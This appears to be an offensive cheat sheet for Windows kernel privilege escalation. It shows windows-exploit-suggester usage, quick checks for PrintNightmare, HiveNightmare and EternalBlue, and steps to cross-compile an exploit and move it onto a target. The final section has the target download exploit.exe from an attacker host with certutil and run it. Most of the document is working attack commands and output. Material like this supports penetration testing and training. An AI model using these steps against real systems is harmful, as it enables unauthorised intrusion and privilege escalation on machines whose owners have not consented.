KERNEL EXPLOITS

windows-exploit-suggester

Match OS/patches to exploits — Run on attacker machine

systeminfo > sysinfo.txt
python3 wes.py sysinfo.txt
Example Output
python3 wes.py sysinfo.txt
[E] MS17-010: EternalBlue
    Affected: Windows Server 2016
    KB: KB4013389 (NOT installed)
[E] CVE-2021-1732: Win32k Elevation
    Affected: Windows 10/Server 2019
[M] CVE-2020-0787: BITS Elevation
    Affected: All Windows versions
(Cross-reference with installed hotfixes)

Check for common CVEs

Quick manual check — Based on OS version

PrintNightmare (CVE-2021-34527)
HiveNightmare (CVE-2021-36934)
EternalBlue (MS17-010)
MS16-032 (Secondary Logon)
Example Output
PrintNightmare (CVE-2021-1675):
Get-Service Spooler -> Running = potentially vulnerable

HiveNightmare (CVE-2021-36934):
icacls C:\Windows\System32\config\SAM -> BUILTIN\Users:(I)(RX) = vulnerable!

EternalBlue (MS17-010):
nmap --script smb-vuln-ms17-010 -p 445 target
(Check each based on OS version)

Compile and transfer exploit

Match architecture — x86 vs x64 matters

Cross-compile or use pre-compiled binaries from GitHub
Example Output
On attacker:
x86_64-w64-mingw32-gcc exploit.c -o exploit.exe
python3 -m http.server 80

On target:
certutil -urlcache -split -f http://ATTACKER/exploit.exe C:\temp\exploit.exe
C:\temp\exploit.exe
(Cross-compile Windows exploits on Linux)